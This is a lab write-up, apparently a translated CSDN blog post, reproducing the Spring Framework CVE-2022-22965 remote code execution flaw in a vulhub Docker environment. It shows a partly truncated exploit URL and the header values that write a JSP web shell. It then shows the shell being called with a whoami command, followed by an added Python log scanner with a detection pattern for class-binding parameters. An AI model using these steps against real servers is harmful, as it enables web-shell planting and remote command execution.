Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965): Reproduction

0x01 Vulnerability Introduction

Spring Framework is an open-source application framework designed to reduce the complexity of application development. It has a layered architecture, lets users choose which components to use, and provides a useful framework for J2EE application development. When a Spring application is deployed on JDK 9 or later, a remote attacker can exploit this vulnerability to write malicious code and achieve remote code execution.

0x02 Vulnerability Reproduction

Environment: vulhub/spring/CVE-2022-22965 at master (vulhub/vulhub on GitHub)

In that directory, run docker-compose up -d to start the environment with one command:

The service is now listening on port 8080:

After opening the page, you can see that the current service is up:

http://127.0.0.1:8080/

Follow the author's link:

http://127.0.0.1:8080/?name=Bob&age=25

The page appears:

Then, following the prompt, construct the request URL (this is not the only way to do it):

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25

After the request is issued, it needs to be modified:

The red part is replaced with:

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2

The effect is shown in the figure below:

Then visit:

http://10.30.2.146:8080//tomcatwar.jsp?pwd=j&cmd=whoami

The command is executed!

Note that each repeated execution here keeps writing to the log file, so do not run it frequently!
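Seen from the defender's side, the request constructed above stands out by its parameter name: it binds through the class property (class.module.classLoader...). The following is an added example, not part of the original post or of vulhub: a Python check that flags such parameter names in an access log. The log format, the sample lines and the function names are constructed for illustration, and the four pattern shapes (class.*, Class.*, *.class.*, *.Class.*) are an assumed deny-list.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Property paths that walk through a bean's `class` property, in the four
# shapes class.*, Class.*, *.class.*, *.Class.* (assumed deny-list shapes).
CLASS_PATH = re.compile(r"(^|\.)[cC]lass\.")
REQUEST_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def class_binding_params(target):
    """Return decoded query parameter names that bind through `class`."""
    hits = []
    query = urlsplit(target).query
    for name, _value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(name)  # second pass catches double-encoded names
        if CLASS_PATH.search(decoded):
            hits.append(decoded)
    return hits


def scan(lines):
    """Return (line_number, client, parameter_names) per flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a request line in the expected format
        names = class_binding_params(match.group("target"))
        if names:
            findings.append((number, line.split()[0], names))
    return findings


# Constructed sample lines in common log format (not taken from the post).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2022:10:00:01 +0000] "GET /?name=Bob&age=25 HTTP/1.1" 200 21',
    '192.0.2.66 - - [01/Apr/2022:10:00:07 +0000] "GET /?class.module.classLoader'
    '.resources.context.parent.pipeline.first.pattern=x HTTP/1.1" 200 21',
    '192.0.2.66 - - [01/Apr/2022:10:00:09 +0000] "GET /?class%2Emodule%2EclassLoader.x=1 HTTP/1.1" 400 0',
    '192.0.2.10 - - [01/Apr/2022:10:00:12 +0000] "GET /?classroom=3&subclass.id=7 HTTP/1.1" 200 21',
]

if __name__ == "__main__":
    for number, client, names in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent {', '.join(names)}")
```

Access logs only record the query string, so parameters sent in a request body need the same name check at a filter or WAF that can see the body.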

Origin blog.csdn.net/qq_18209847/article/details/124025563